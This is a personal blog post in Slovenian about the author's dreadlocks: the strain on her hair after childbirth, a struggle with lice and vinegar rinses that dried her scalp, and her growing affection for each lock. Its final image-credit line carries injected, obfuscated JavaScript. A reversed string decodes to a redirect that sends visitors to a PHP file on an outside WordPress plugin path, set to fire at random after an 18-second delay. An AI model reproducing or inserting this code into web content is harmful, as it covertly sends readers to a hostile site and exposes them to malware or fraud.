Dreadlock update

Čez toliko izkušenj kot sem šla z dredi, pa res sama volja, da so še tukaj.

Resno, čez koliko stvari so šli moji lasje, neverjetno.
Po rojstvu sina so moji lasje začeli izpadati in redko kdaj sem si vzela čas, da bi jih razčesala. Cele dneve in noči sem nosila tisto znano “mama figo” in to je bilo to. Zato sem se odločila za drede.

V resnici sem že dolgo časa razmišljala o tem koraku. A si sploh nisem predstavljala kaj vse še to prinese zraven. Moji lasje so šli čez veliko preizkušnjo. Poleg izpadanja in izdelovanja dredov, sem se prvič v življenju spoznala tudi z ušmi, ki smo jih prinesli iz vrtca. Od takrat naprej sem si dolgo časa lase konstantno umivala s kisom. Ker me je vsakič, ko sem samo pomislila na to, zajela panika. Kis lepo očisti lase in jih pusti mehke, drede pa sveže in lahkotne. A problem nastane pri lasišču. Tega povsem izsuši in postane srbeče. Potrebovala sem kar nekaj časa, da sem dejansko pustila paranojo z ušmi za sabo. Ker je bil na koncu to že začaran krog. Srbeče lasišče, kis, srbeče lasišče, kis, srbeče lasišče,… Lahko si predstavljate kaj se je v vsem tem “tretmaju” z mojo kožo na glavi zgodilo. Poleg tega, da se privaja na same drede, ki postajajo vedno težji.

Vendar pa, sem srečna. “Zdravilo”  za lasišče bom že še našla. Srečna sem, ker jih imam. Šele zdaj vidim, da je vsak izmed njih čisto svoj in da je vsak v najglobjem smislu nekaj posebnega. En je vijugast, drugi tanek, tretji debel in četrti dolg. V vsem času in preizkušnjah so začeli odraščati vsak v svojo zase najboljšo obliko.

To sem občutila danes, ko sem si popravljala narastek. Res imajo neko posebno energijo. Vsakega posebej imem nekako rada. Vsakega posebej sem sprejela z ljubeznijo. Pa si nisem predstavljala kaj L. ali B. res mislita, ko sta to rekli. Preprosto si nisem uspela predstavljati, zdaj pa ne znam opisati. Če imaš drede, veš o čem govori. Če jih nimaš, pa bi jih moral imeti, da bi vedel.

Končno so začeli odraščati, rasti. In jaz z njimi.

Z Ljubezniijo;
(Ni)Si

Prikazana slika: $NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tos/dreadlock?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText”>Unsplash